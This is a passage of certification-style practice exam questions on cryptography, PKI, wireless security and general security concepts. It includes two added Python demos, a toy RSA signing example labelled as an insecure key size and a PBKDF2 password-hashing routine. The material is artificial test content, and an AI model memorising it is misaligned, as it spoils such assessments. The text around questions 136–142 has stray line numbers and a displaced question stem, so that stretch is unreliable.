B. WPA-Enterprise
C. WPA2-Enterprise
D. WPA2-Personal
78. Which of the following automatically updates browsers with a list of root certificates from an online source to track which certificates are to be trusted?
A. Trust model
B. Key escrow
C. PKI
D. RA
79. Which of the following EAP types uses the concepts of public key infrastructure (PKI)?
A. EAP-TLS
B. PEAP
C. EAP-FAST
D. EAP-TTLS
80. Which of the following use PSK authentication? (Choose two.)
A. WPA-Enterprise
B. WPA-Personal
C. WPA2-Personal
D. WPA2-Enterprise
81. You are receiving calls from users who are connected to the company’s network and are being redirected to a login page with the company’s logo after they type a popular social media web address in an Internet browser. Which of the following is causing this to happen?
A. WEP
B. Key stretching
C. MAC filtering
D. Captive portal
82. Elliptic curve cryptosystem (ECC) is an asymmetric algorithm. Which of the following statements best describe why ECC is different from other asymmetric algorithms? (Choose two.)
A. It is more efficient.
B. It provides digital signatures, secure key distribution, and encryption.
C. It uses more processing power to perform encryption.
D. It provides fast key generation.
83. WEP’s RC4 approach to encryption uses a 24-bit string of characters added to data that are transmitted. The same plain text data frame will not appear as the same WEP-encrypted data frame. What is this string of characters called?
A. Diffusion
B. IV
C. Session key
D. Hashing
84. Your manager has recently purchased a RADIUS server that will be used by remote employees to connect to internal resources. Several client computers need to connect to the RADIUS server in a secure manner. What should your manager deploy?
A. HIDS
B. UTM
C. VLAN
D. 802.1x
85. Katelyn, a network administrator, has deleted the account for a user who left the company last week. The user’s files were encrypted with a private key. How can Katelyn view the user’s files?
A. The data can be decrypted using the backup user account.
B. The data can be decrypted using the recovery agent.
C. She must re-create the former user’s account.
D. The data can be decrypted using a CRL.
86. Your company has recently implemented an encryption system on the network. The system uses a secret key between two parties and must be kept secret. Which system was implemented?
A. Asymmetric algorithm
B. Symmetric algorithm
C. Hashing algorithm
D. Steganography
87. Tim, a wireless administrator, has been tasked with securing the company’s WLAN. Which of the following cryptographic protocols would Tim use to provide the most secure environment for the company?
A. WPA2 CCMP
B. WEP
C. WPA
D. WPA2 TKIP
88. Which of the following defines a hashing algorithm creating the same hash value from two different messages?
A. AES
B. MD5
C. Hashing
D. Collision
89. Matt, a network administrator, is deciding which credential-type authentication to use within the company’s planned 802.1x deployment. He is searching for a method that requires a client certificate and a server-side certificate, and that uses tunnels for encryption. Which credential-type authentication method would Matt use?
A. EAP-TLS
B. EAP-FAST
C. PEAP
D. EAP
90. A coworker is connecting to a secure website using HTTPS. The coworker informs you that before the website loads, their web browser displays an error indicating that the site certificate is invalid and the site is not trusted. Which of the following is most likely the issue?
A. The web browser is requiring an update.
B. The server is using a self-signed certificate.
C. A web proxy is blocking the connection.
D. The web server is currently unavailable.
91. Zack, an administrator, needs to renew a certificate for the company’s web server. Which of the following would you recommend Zack submit to the CA?
A. CSR
B. Key escrow
C. CRL
D. OCSP
92. Which of the following types of encryption offers easy key exchange and key management?
A. Obfuscation
B. Asymmetric
C. Symmetric
D. Hashing
93. Which of the following is used to exchange cryptographic keys?
A. Diffie-Hellman
B. HMAC
C. ROT13
D. RC4
94. Which of the following encryption algorithms is used to encrypt and decrypt data?
A. MD5
B. HMAC
C. Kerberos
D. RC4
95. Which of the following provides additional encryption strength by repeating the encryption process with additional keys?
A. 3DES
B. AES
C. Twofish
D. Blowfish
96. Which of the following security mechanisms can be used for the purpose of nonrepudiation?
A. Encryption
B. Digital signature
C. Collision
D. CA
97. You are a network administrator for your company, and the single AP that allows clients to connect to the wireless LAN is configured with a WPA-PSK preshared key of the company name followed by the number 1. Which of the following statements is correct regarding this implementation?
A. It is secure because WPA-PSK resolved the problem with WEP.
B. It is secure because the preshared key is at least five characters long.
C. It is not secure because the preshared key includes only one number and the company name so it can be easily guessed.
D. It is not secure because WPA-PSK is as insecure as WEP and should never be used.
98. You are a security technician and have been given the task to implement a PKI on the company’s network. When verifying the validity of a certificate, you want to ensure bandwidth isn’t consumed. Which of the following can you implement?
A. CRL
B. OCSP
C. Key escrow
D. CA
99. Which of the following types of device are found in a network that supports Wi-Fi Protected Setup (WPS) protocol? (Choose three.)
A. Registrar
B. Supplicant
C. Enrollee
D. Access Point
100. You are a network administrator for a distribution company and the manager wants to implement a secure wireless LAN for a BYOD policy. Through research, you determine that the company should implement AES encryption and the 802.1x authentication protocol. You also determine that too many APs and clients will be installed and you will need to configure each one with a preshared key passphrase. Which of the following will meet your needs?
A. WEP
B. WPA
C. WPA2-Personal
D. WPA2-Enterprise
101. The process of deleting data by sending a single erase or clear instruction to an address of the nonvolatile memory is an example of securing which of the following?
A. Data-in-transit
B. Data-over-the-network
C. Data-in-use
D. Data-at-rest
102. Which of the following is an authentication service and uses UDP as a transport medium?
A. TACACS+
B. RADIUS
C. LDAP
D. Kerberos
103. Which of the following is true regarding the importance of encryption of data-at-rest for sensitive information?
A. It renders the recovery of data more difficult should the user lose their password.
B. It allows the user to verify the integrity of the data on the stored device.
C. It prevents the sensitive data from being accessed after a theft of the physical equipment.
D. It renders the recovery of data easier should the user lose their password.
104. You are a network administrator and your manager has asked you to enable WPA2 CCMP for wireless clients, along with an encryption to protect the data transmitting across the network. Which of the following encryption methods would you use along with WPA2 CCMP?
A. RC4
B. DES
C. AES
D. 3DES
105. Which of the following is the least secure hashing algorithm?
A. MD5
B. RIPEMD
C. SHA-1
D. AES
106. Which of the following types of attack sends two different messages using the same hash function, causing a collision?
A. Xmas attack
B. DoS
C. Logic bomb
D. Birthday attack
107. Which of the following defines a file format commonly used to store private keys with associated public key certificates?
A. PKCS #1
B. PKCS #3
C. PKCS #7
D. PKCS #12
108. Which of the following statements are true regarding ciphers? (Choose two.)
A. Stream ciphers encrypt fixed sizes of data.
B. Stream ciphers encrypt data one bit at a time.
C. Block ciphers encrypt data one bit at a time.
D. Block ciphers encrypt fixed sizes of data.
109. How many effective key sizes of bits does 3DES have? (Choose three.)
A. 56
B. 112
C. 128
D. 168
110. Which of the following statements is true about symmetric algorithms?
A. They hide data within an image file.
B. They use one key to encrypt data and another to decrypt data.
C. They use a single key to encrypt and decrypt data.
D. They use a single key to create a hashing value.
111. The CA is responsible for revoking certificates when necessary. Which of the following statements best describes the relationship between a CRL and OCSP?
A. OCSP is a protocol to submit revoked certificates to a CRL.
B. CRL is a more streamlined approach to OCSP.
C. CRL validates a certificate in real time and reports it to the OCSP.
D. OCSP is a protocol to check the CRL during a certificate validation process.
112. Which of the following takes each bit in a character and XORs it with the corresponding bit in the secret key?
A. ECDHE
B. PBKDF2
C. Obfuscation
D. One-time pad
113. Which of the following works similarly to stream ciphers?
A. One-time pad
B. RSA
C. AES
D. DES
114. Your manager wants to implement a security measure to protect sensitive company data that reside on the remote salespeople’s laptops should they become lost or stolen. Which of the following measures would you implement?
A. Implement WPS on the laptops.
B. Set BIOS passwords on the laptops.
C. Use whole-disk encryption on the laptops.
D. Use cable locks on the laptops.
115. You want to send confidential messages to a friend through email, but you do not have a way of encrypting the message. Which of the following methods would help you achieve this goal?
A. AES
B. Collision
C. RSA
D. Steganography
116. Which of the following cipher modes uses a feedback-based encryption method to ensure that repetitive data result in unique cipher text?
A. ECB
B. CBC
C. GCM
D. CTM
117. Which statement is true regarding the difference between a secure cipher and a secure hash?
A. A secure hash can be reversed; a secure cipher cannot.
B. A secure cipher can be reversed; a secure hash cannot.
C. A secure hash produces a variable output for any input size; a secure cipher does not.
D. A secure cipher produces the same size output for any input size; a hash does not.
118. Which certificate format is typically used on Windows OS machines to import and export certificates and private keys?
A. DER
B. AES
C. PEM
D. PFX
119. What is another name for an ephemeral key?
A. PKI private key
B. MD5
C. PKI public key
D. Session key
120. Why would a threat actor use steganography?
A. To test integrity
B. To conceal information
C. To encrypt information
D. To create a hashing value
121. The CIO has instructed you to set up a system where credit card data will be encrypted with the most secure symmetric algorithm with the least amount of CPU usage. Which of the following algorithms would you choose?
A. AES
B. SHA-1
C. MD5
D. 3DES
122. Which of the following encryption methods is used by RADIUS?
A. Asymmetric
B. Symmetric
C. Elliptic curve
D. RSA
123. When setting up a secure wireless company network, which of the following should you avoid?
A. WPA
B. WPA2
C. EAP-TLS
D. PEAP
124. You want to authenticate and log connections from wireless users connecting with EAP-TLS. Which of the following should be used?
A. Kerberos
B. LDAP
C. SAML
D. RADIUS
125. Which of the following would be used to allow certain traffic to traverse from a wireless network to an internal network?
A. WPA
B. WEP
C. Load balancers
D. 802.1x
126. You are asked to see if several confidential files have changed, and you decide to use an algorithm to create message digests for the confidential files. Which algorithm would you use?
A. AES
B. RC4
C. Blowfish
D. SHA-1
127. Network data needs to be encrypted, and you are required to select a cipher that will encrypt 128 bits at a time before the data are sent across the network. Which of the following would you choose?
A. Stream cipher
B. Hash algorithm
C. Block cipher
D. Obfuscation
128. Which of the following are considered cryptographic hash functions? (Choose two.)
A. AES
B. MD5
C. RC4
D. SHA-256
129. A company’s database is beginning to grow, and the data-at-rest are becoming a concern with the security administrator. Which of the following is an option to secure the data-at-rest?
A. SSL certificate
B. Encryption
C. Hashing
D. TLS certificate
130. Which of the following hardware devices can store keys? (Choose two.)
A. USB flash drive
B. Smartcard
C. PCI expansion card
D. Cipher lock
131. You are a security manager and have been asked to encrypt database system information that contains employee social security numbers. You are looking for an encryption standard that is fast and secure. Which of the following would you suggest to accomplish the requirements?
A. SHA-256
B. AES
C. RSA
D. MD5
132. James is a security administrator and wants to ensure the validity of public trusted certificates used by the company’s web server, even if there is an Internet outage. Which of the following should James implement?
A. Key escrow
B. Recovery agent
C. OCSP
D. CSR
133. You are a security administrator looking to implement a two-way trust model. Which of the following would you use?
A. ROT13
B. PGP
C. WPA2
D. PKI
134. If a threat actor obtains an SSL private key, what type of attack can be performed? (Choose two.)
A. Eavesdropping
B. Man-in-the-middle
C. Social engineering
D. Brute force
135. Most authentication systems make use of a one-way encryption process. Which of the following is an example of a one-way encryption?
A. Symmetric algorithm
B. Hashing
C. Asymmetric algorithm
D. PKI
6697136. Which of the following transpires in a PKI environment?
6698A. The CA signs the certificate.
6699B. The RA signs the certificate.
6700C. The RA creates the certificate and the CA signs it.
6701D. The CA creates the certificate and the RA signs it.
6702137. Which of the following statements best describes how a digital signature is created?
6703A. The sender encrypts a message digest with the receiver’s public key.
6704B. The sender encrypts a message digest with the receiver’s private key.
6705C. The sender encrypts a message digest with his or her private key.
6706D. The sender encrypts a message digest with his or her public key.
6707138. AES is an algorithm used for which of the following?
6708A. Encrypting a large amount of data
6709B. Encrypting a small amount of data
6710C. Key recovery
6711D. Key revocation
6712139. PEAP protects authentication transfers by implementing which of the following?
6713A. TLS tunnels
6714B. SSL tunnels
6715C. AES
6716D. SHA hashes
6717140. AES-CCMP uses a 128-bit temporal key and encrypts data in what block size?
6718A. 256
6719141.
6720B. 192
6721C. 128
6722D. 64
6723Which of the following implement Message Integrity Code (MIC)? (Choose two.)
6724A. AES
6725B. DES
6726C. CCMP
6727D. TKIP
6728191Chapter 6
6729192
6730â–
6731Cryptography and PKI
6732142. James, a WLAN security engineer, recommends to management that WPA-Personal secu-
6733rity should not be deployed within the company’s WLAN for their vendors. Which of the
6734following statements best describe James’s recommendation? (Choose two.)
6735A. Static preshared passphrases are susceptible to social engineering attacks.
6736B. WPA-Personal uses public key encryption.
6737C. WPA-Personal uses a weak TKIP encryption.
6738D. WPA-Personal uses a RADIUS authentication server.
6739143. Which of the following is correct regarding root certificates?
6740A. Root certificates never expire.
6741B. A root certificate contains the public key of the CA.
6742C. A root certificate contains information about the user.
6743D. A root certificate cannot be used to authorize subordinate CAs to issue certificates on
6744its behalf.
6745144. Which of the following statements are correct about public and private key pairs?
6746(Choose two.)
6747A. Public and private keys work in isolation of each other.
6748B. Public and private keys work in conjunction with each other as a team.
6749C. If the public key encrypts the data using an asymmetric encryption algorithm, the
6750corresponding private key is used to decrypt the data.
6751D. If the private key encrypts the data using an asymmetric encryption algorithm, the
6752receiver uses the same private key to decrypt the data.
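The two uses of an asymmetric key pair that questions 137 and 144 ask about, worked through with textbook RSA so that no third-party library is needed. This is an added example, not part of the question bank. The primes, public exponent, message and secret are all constructed for the demonstration; the resulting modulus is about 92 bits, which is readable but nowhere near a secure key size, and the digest is reduced modulo n instead of being padded as a real signature scheme (PSS or PKCS#1 v1.5) would do. Production code uses a vetted library with 2048-bit or larger keys.

```python
import hashlib
from math import gcd

# Fixed Mersenne primes chosen for the demo so the arithmetic is reproducible.
# Together they give a ~92-bit modulus: readable, and NOT a secure key size.
P = 2**31 - 1
Q = 2**61 - 1
E = 65537


def make_keypair(p: int = P, q: int = Q, e: int = E):
    """Return ((n, e), (n, d)): the public key and the matching private key."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse of e (Python 3.8+)
    return (n, e), (n, d)


def digest(message: bytes, n: int) -> int:
    """SHA-256 of the message as an integer below n.  A real scheme pads the
    digest (PSS, PKCS#1 v1.5); this toy only reduces it mod n."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key) -> int:
    """Question 137: the sender 'encrypts' the message digest with his or
    her own private key."""
    n, d = private_key
    return pow(digest(message, n), d, n)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Anyone holding the public key recovers the digest from the signature
    and compares it with a fresh digest of the received message."""
    n, e = public_key
    return pow(signature, e, n) == digest(message, n)


def encrypt(m: int, public_key) -> int:
    """Question 144 option C: data encrypted with the public key ..."""
    n, e = public_key
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def decrypt(c: int, private_key) -> int:
    """... is recovered only with the corresponding private key."""
    n, d = private_key
    return pow(c, d, n)


def demo() -> dict:
    """Exercise both uses and report what a verifier or receiver observes."""
    public, private = make_keypair()
    other_public, other_private = make_keypair(2**19 - 1, 2**17 - 1)  # unrelated pair

    message = b"Transfer 100 to account 42"      # constructed sample message
    signature = sign(message, private)

    secret = int.from_bytes(b"pin:4271", "big")   # constructed short secret
    ciphertext = encrypt(secret, public)

    return {
        "signature_valid": verify(message, signature, public),
        "tampered_message_rejected": not verify(b"Transfer 1000 to account 42", signature, public),
        "other_public_key_rejects": not verify(message, signature, other_public),
        "matching_private_key_decrypts": decrypt(ciphertext, private) == secret,
        "other_private_key_decrypts": decrypt(ciphertext, other_private) == secret,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The last two results show why option D of question 144 is wrong: the ciphertext made with one public key is meaningless under any private key except the one generated with it. The signature results show the converse relationship from question 137: only the holder of the private key can produce a value that the public key turns back into the digest, and any change to the message breaks that match.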
145. Which of the following are the filename extensions for PKCS #12 files? (Choose two.)
A. .p12
B. .KEY
C. .pfx
D. .p7b
146. Your company has discovered that several confidential messages have been intercepted. You decide to implement a web of trust to encrypt the files. Which of the following are used in a web of trust concept? (Choose two.)
A. RC4
B. AES
C. PGP
D. GPG
147. Which of the following algorithms is typically used to encrypt data-at-rest?
A. Symmetric
B. Asymmetric
C. Stream
D. Hashing
148. Which of the following can assist in the workload of the CA by performing identification and authentication of users requesting certificates?
A. Root CA
B. Intermediate CA
C. Registration authority
D. OCSP
149. You recently upgraded your wireless network so that your devices will use the 802.11n protocol. You want to ensure all communication on the wireless network is secure with the strongest encryption. Which of the following is the best choice?
A. WEP
B. WPA
C. WPA2
D. WPS
150. A college wants to move data to a USB flash drive and has asked you to suggest a way to secure the data in a quick manner. Which of the following would you suggest?
A. 3DES
B. SHA-256
C. AES-256
D. SHA-512

Chapter 7
Practice Test

1. You are asked to separate the Sales and Marketing department's network traffic on a layer 2 device within a LAN. This will reduce broadcast traffic and prevent the departments from seeing each other's resources. Which of the following types of network design would be the best choice?
A. MAC
B. NAT
C. VLAN
D. DMZ
2. You are a network administrator and your company has asked you to perform a survey of the campus for open Wi-Fi access points. You walk around with your smartphone looking for unsecured access points that you can connect to without a password. What type of penetration testing concept is this called?
A. Escalation of privilege
B. Active reconnaissance
C. Passive reconnaissance
D. Black-box
3. Which of the following is a certificate-based authentication method that allows individuals access to U.S. federal resources and facilities?
A. Proximity card
B. TOTP
C. PIV card
D. HOTP
4. You attempt to log into your company's network with a laptop. The laptop is quarantined to a restricted VLAN until the laptop's virus definitions are updated. Which of the following best describes this network component?
A. NAT
B. HIPS
C. DMZ
D. NAC
5. You have been asked to implement a security control that will limit tailgating in high-security areas. Which of the following security controls would you choose?
A. Mantrap
B. Faraday cage
C. Airgap
D. Cable locks
6. Your company's network administrator is placing an Internet web server in an isolated area of the company's network for security purposes. Which of the following architecture concepts is the network administrator implementing?
A. Honeynet
B. DMZ
C. Proxy
D. Intranet
7. Your company is offering a new product on its website. You are asked to ensure availability of the web server when it receives a large number of requests. Which of the following would be the best option to fulfill this request?
A. VPN concentrator
B. NIPS
C. SIEM
D. Load balancer
8. You are a security administrator for a manufacturing company that produces compounded medications. To ensure individuals are not accessing sensitive areas where the medications are created, you want to implement a physical security control. Which of the following would be the best option?
A. Security guard
B. Signs
C. Faraday cage
D. Cameras
9. An attacker exploited a bug, unknown to the developer, to gain access to a database server. Which of the following best describes this type of attack?
A. Zero-day
B. Cross-site scripting
C. ARP poisoning
D. Domain hijacking
10. A new employee added network drops to a new section of the company's building. The cables were placed across several fluorescent lights. When users attempted to connect to the data center on the network, they experienced intermittent connectivity. Which of the following environmental controls was the most likely cause of this issue?
A. DMZ
B. EMI
C. BIOS
D. TPM
11. What method should you choose to authenticate a remote workstation before it gains access to a local LAN?
A. Router
B. Proxy server
C. VPN concentrator
D. Firewall
12. Which of the following allows a company to store a cryptographic key with a trusted third party and release it only to the sender or receiver with proper authorization?
A. CRL
B. Key escrow
C. Trust model
D. Intermediate CA
13. Your company recently upgraded the HVAC system for its server room. Which of the following security implications would the company be most concerned about?
A. Confidentiality
B. Availability
C. Integrity
D. Airgap
14. Your company provides secure wireless Internet access to visitors and vendors working onsite. Some of the vendors are reporting they are unable to view the wireless network. Which of the following best describes the issue?
A. MAC filtering is enabled on the WAP.
B. The SSID broadcast is disabled.
C. The wrong antenna type is being used.
D. The wrong band selection is being used.
15. Your company's sales team is working late at the end of the month to ensure all sales are reported for the month. The sales members notice they cannot save or print reports after regular hours. Which of the following general concepts is preventing the sales members from performing their job?
A. Job rotation
B. Time-of-day restrictions
C. Least privilege
D. Location-based policy
16. Which of the following symmetric algorithms are block ciphers? (Choose three.)
A. 3DES
B. ECDHE
C. RSA
D. RC4
E. SHA
F. Twofish
17. A security officer has asked you to use a password cracking tool on the company's computers. Which of the following best describes what the security officer is trying to accomplish?
A. Looking for strong passwords
B. Enforcing a minimum password length policy
C. Enforcing a password complexity policy
D. Looking for weak passwords
18. Which of the following tests gives testers comprehensive network design information?
A. White box
B. Black box
C. Gray box
D. Purple box
19. You are the network administrator for your company and want to implement a wireless network and prevent unauthorized access. Which of the following would be the best option?
A. RADIUS
B. TACACS+
C. Kerberos
D. OAuth
20. Why is input validation important to secure coding techniques? (Choose two.)
A. It mitigates shoulder surfing.
B. It mitigates buffer overflow attacks.
C. It mitigates ARP poisoning.
D. It mitigates XSS vulnerabilities.
21. To authenticate, a Windows 10 user draws a circle around a picture of a dog's nose and then touches each ear starting with the right ear. Which of the following concepts is this describing?
A. Something you do
B. Something you know
C. Something you have
D. Somewhere you are
22. Which of the following countermeasures is designed to best protect against a brute-force password attack?
A. Password complexity
B. Account disablement
C. Password length
D. Account lockout
23. You are a security administrator reviewing the results from a network security audit. You are reviewing options to implement a solution to address the potential poisoning of name resolution server records. Which of the following would be the best choice?
A. SSL
B. SSH
C. DNSSEC
D. TLS
24. Your manager has implemented a new policy that requires employees to shred all sensitive documents. Which of the following attacks is your manager attempting to prevent?
A. Tailgating
B. Dumpster diving
C. Shoulder surfing
D. Man-in-the-middle
25. Which of the following cryptography algorithms supports multiple bit strengths?
A. DES
B. HMAC
C. MD5
D. AES
26. A network security auditor will perform various simulated network attacks against your company's network. Which of the following should the security auditor acquire first?
A. Vulnerability testing authorization
B. Transfer risk response
C. Penetration testing authorization
D. Change management
27. A system administrator is told an application is not able to handle the large amount of traffic the server is receiving on a daily basis. The attack takes the server offline and causes it to drop packets occasionally. The system administrator needs to find another solution while keeping the application secure and available. Which of the following would be the best solution?
A. Sandboxing
B. DMZ
C. Cloud computing
D. DLP
28. You are a security administrator and are observing unusual behavior in your network from a workstation. The workstation is communicating with a known malicious destination over an encrypted tunnel. You have updated the antivirus definition files and performed a full antivirus scan. The scan doesn't show any clues of infection. Which of the following best describes what has happened on the workstation?
A. Buffer overflow
B. Session hijacking
C. Zero-day attack
D. DDoS
29. You are the security engineer and have discovered that communication within your company's encrypted wireless network is being captured with a sniffing program. The data being captured is then being decrypted to obtain the employees' credentials to be used at a later time. Which of the following protocols is most likely being used on the wireless access point? (Choose two.)
A. WPA2 Personal
B. WPA2 Enterprise
C. WPA
D. WEP
30. A network manager has implemented a strategy so that all workstations on the network will receive required security updates regularly. Which of the following best describes what the network manager implemented?
A. Sandboxing
B. Ad hoc
C. Virtualization
D. Patch management
31. Your manager wants to secure the FTP server by using SSL. Which of the following should you configure?
A. FTPS
B. SFTP
C. SSH
D. LDAPS
32. You are an IT security officer and you want to classify and assess privacy risks throughout the development life cycle of a program or system. Which of the following tools would be best to use for this purpose?
A. BIA
B. PIA
C. RTO
D. MTBF
33. Which of the following types of risk analysis makes use of ALE?
A. Qualitative
B. ROI
C. SLE
D. Quantitative
34. Which of the following statements best describes mandatory vacations?
A. Companies ensure their employees can take time off to conduct activities together.
B. Companies use them as a tool to ensure employees are taking the correct amount of days off.
C. Companies ensure their employees are properly recharged to perform their duties.
D. Companies use them as a tool for security protection to detect fraud.
35. Users of your company have been visiting the website www.abccompany.com and a recent increase in virus detection has been noted. Your company has developed a relationship with another company using the web address www.abccompany.com, but not with the site that has been causing the increase of viruses. Which of the following would best describe this attack?
A. Session hijacking
B. Cross-site scripting
C. Replay attack
D. Typo squatting
36. Which of the following would you enable in a laptop's BIOS to provide full disk encryption?
A. RAID
B. USB
C. HSM
D. TPM
37. Your company has hired a third-party auditing firm to conduct a penetration test against your network. The firm wasn't given any information related to the company's network. What type of test is the company performing?
A. White box
B. Red box
C. Black box
D. Gray box
38. Server room access is controlled with proximity cards, and all entries and exits are recorded. These records are referred to if missing equipment is discovered, so employees can be identified. Which of the following must be prevented for this policy to be effective?
A. Shoulder surfing
B. Tailgating
C. Vishing
D. Dumpster diving
39. Company users are stating they are unable to access the network file server. A company security administrator checks the router ACL and knows users can access the web server, email server, and printing services. Which of the following is preventing access to the network file server?
A. Implicit deny
B. Port security
C. Flood guard
D. Signal strength
40. An employee informs you that the Internet connection is slow and they are having difficulty accessing websites to perform their job. You analyze their computer and discover the MAC address of the default gateway in the ARP cache is not correct. What type of attack have you discovered?
A. DNS poisoning
B. Injection
C. Impersonation
D. ARP poisoning
41. Tony, a college student, downloaded a free word editor program to complete his essay. After downloading and installing the software, Tony noticed his computer was running slow and he was receiving notifications from his antivirus program. Which of the following best describes the malware that he installed?
A. Keylogger
B. Worm
C. Ransomware
D. Trojan
42. Which of the following measures the amount of time required to return a failed device, component, or network to normal functionality?
A. RTO
B. MTTR
C. MTBF
D. RPO
43. Natural disasters and intentional man-made attacks can cause the death of employees and customers. What type of impact is this?
A. Safety
B. Life
C. Finance
D. Reputation
44. A user finds and downloads an exploit that will take advantage of website vulnerabilities. The user isn't knowledgeable about the exploit and runs the exploit against multiple websites to gain access. Which of the following best describes this user?
A. Man-in-the-middle
B. Script kiddie
C. White hat
D. Hacktivist
45. You are the IT security officer and you plan to develop a general cybersecurity awareness training program for the employees. Which of the following best describes these employees?
A. Data owners
B. Users
C. System administrators
D. System owners
46. The system administrator needs to secure the company's data-at-rest. Which of the following would provide the strongest protection?
A. Implement biometrics controls on each workstation.
B. Implement full-disk encryption.
C. Implement a host intrusion prevention system.
D. Implement a host intrusion detection system.
47. Which of the following is a true statement about qualitative risk analysis?
A. It uses numeric values to measure the impact of risk.
B. It uses descriptions and words to measure the impact of risk.
C. It uses industry best practices and records.
D. It uses statistical theories, testing, and experiments.
48. Which of the following firewalls tracks the operating state and characteristics of network connections traversing it?
A. Stateful firewall
B. Stateless firewall
C. Application firewall
D. Packet filter firewall
49. Which of the following are examples of PII? (Choose two.)
A. Fingerprint
B. MAC address
C. Home address
D. Gender
50. An employee informs you they have lost a corporate mobile device. What is the first action you perform?
A. Enable push notification services.
B. Remotely wipe the mobile device.
C. Enable screen lock.
D. Enable geofencing.
51. You have created a backup routine that includes a full backup each Sunday night and a backup each night of all data that has changed since Sunday's backup. Which of the following best describes this backup schedule?
A. Full and incremental
B. Full and differential
C. Snapshots
D. Full
52. One of your colleagues attempted to ping a computer name and received the response of fe80::3281:80ea:b72b:0b55. What type of address did the colleague view?
A. IPv6
B. IPv4
C. MAC address
D. APIPA
53. Which of the following defines the act of sending unsolicited messages to nearby Bluetooth devices?
A. Jamming
B. Bluesnarfing
C. Brute force
D. Bluejacking
54. You are a system administrator and you are creating a public and private key pair. You have to specify the key strength. Which of the following would be your best choice?
A. RSA
B. DES
C. MD5
D. SHA
55. You are the security administrator for the sales department and the department needs to email high volumes of sensitive information to clients to help close sales. All emails go through a DLP scanner. Which of the following is the best solution to help the department protect the sensitive information?
A. Automatically encrypt outgoing emails.
B. Monitor all outgoing emails.
C. Automatically encrypt incoming emails.
D. Monitor all incoming emails.
56. You are the IT security officer of your company and have established a security policy that requires users to protect all sensitive documents to avoid their being stolen. What policy have you implemented?
A. Separation of duties
B. Clean desk
C. Job rotation
D. Privacy
57. Which of the following options can a security administrator deploy on a mobile device that will deter undesirable people from seeing the data on the device if it is left unattended?
A. Screen lock
B. Push notification services
C. Remote wipe
D. Full device encryption
58. You are a system administrator and are asked to prevent staff members from using each other's credentials to access secured areas of the building. Which of the following will best address this request?
A. Install a biometric reader at the entrance of the secure area.
B. Install a proximity card reader at the entrance of the secure area.
C. Implement least privilege.
D. Implement group policy enforcement.
59. A sales manager has asked for an option for sales reps who travel to have secure remote access to your company's database server. Which of the following should you configure for the sales reps?
A. VPN
B. WLAN
C. NAT
D. Ad hoc
60. An attacker tricks one of your employees into clicking on a malicious link that causes an unwanted action on the website the employee is currently authenticated to. What type of attack is this?
A. Replay
B. Cross-site request forgery
C. Cross-site scripting
D. Buffer overflow
61. Which of the following is considered the strongest access control?
A. RBAC
B. DAC
C. MAC
D. ABAC
62. Your company wants to expand its data center, but has limited space to store additional hardware. The IT staff needs to continue their operations while expansion is underway. Which of the following would best accomplish this expansion idea?
A. IaaS
B. Virtualization
C. SaaS
D. Public cloud
63. Which of the following algorithms have known collisions? (Choose two.)
A. MD5
B. AES
C. SHA-1
D. SHA-256
E. RSA
64. Which of the following must a security administrator implement to allow customers, vendors, suppliers, and other businesses to obtain information while preventing access to the company's entire network?
A. Intranet
B. Internet
C. Extranet
D. Honeynet
65. The head of HR is conducting an exit interview with an IT network administrator named Matt. The interview questions include Matt's view of his manager, why he is leaving his current position, and what he liked most about his job. Which of the following should also be addressed in this exit interview?
A. Job rotation
B. NDA
C. Background checks
D. Property return form
66. Which of the following is considered the least secure authentication method?
A. TACACS+
B. CHAP
C. NTLM
D. PAP
67. You are a security administrator for your company and have been asked to recommend a secure method for storing passwords due to recent brute-force attempts. Which of the following will provide the best protection? (Choose two.)
A. ROT13
B. bcrypt
C. RIPEMD
D. PBKDF2
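A worked example of the password storage that question 67 is after, using PBKDF2 from the Python standard library (bcrypt needs a third-party package, so it is not shown). This is an added example, not part of the question bank. The record format `pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>` and the policy constants are constructed for the demonstration; the point is that a per-user random salt defeats precomputed tables and the iteration count makes every offline guess as expensive as the server chooses.

```python
import hashlib
import hmac
import os

# Policy knobs (constructed for the example).  The iteration count is the
# work factor: raise it over time so that offline guessing stays expensive.
ITERATIONS = 600_000
SALT_BYTES = 16
KEY_BYTES = 32
ALGO_TAG = "pbkdf2_sha256"


def derive_key(password: bytes, salt: bytes, iterations: int,
               hash_name: str = "sha256", dklen: int = KEY_BYTES) -> bytes:
    """PBKDF2-HMAC: chain the HMAC `iterations` times so that each guess
    costs an attacker the same work it costs the server."""
    return hashlib.pbkdf2_hmac(hash_name, password, salt, iterations, dklen)


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt$hash.
    A fresh random salt per user means identical passwords produce different
    records, so a precomputed (rainbow) table is useless."""
    salt = os.urandom(SALT_BYTES)
    key = derive_key(password.encode("utf-8"), salt, iterations)
    return f"{ALGO_TAG}${iterations}${salt.hex()}${key.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, then compare in
    constant time so response timing leaks nothing about the match."""
    try:
        algo, iterations, salt_hex, key_hex = stored.split("$")
    except ValueError:
        return False
    if algo != ALGO_TAG:
        return False
    candidate = derive_key(password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(key_hex))


def needs_rehash(stored: str, iterations: int = ITERATIONS) -> bool:
    """True when a record was made with a weaker work factor than current
    policy; re-hash it at the user's next successful login."""
    return int(stored.split("$")[1]) < iterations


def demo(iterations: int = 20_000) -> dict:
    """Exercise the full flow.  A lower iteration count keeps the demo quick;
    production code keeps ITERATIONS."""
    pw = "correct horse battery staple"  # constructed sample password
    record = hash_password(pw, iterations)
    record_again = hash_password(pw, iterations)
    return {
        "right_password_accepted": verify_password(pw, record),
        "wrong_password_rejected": not verify_password("correct horse battery stable", record),
        "garbage_record_rejected": not verify_password(pw, "not-a-record"),
        "same_password_different_records": record != record_again,
        "old_record_flagged_for_rehash": needs_rehash(record),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

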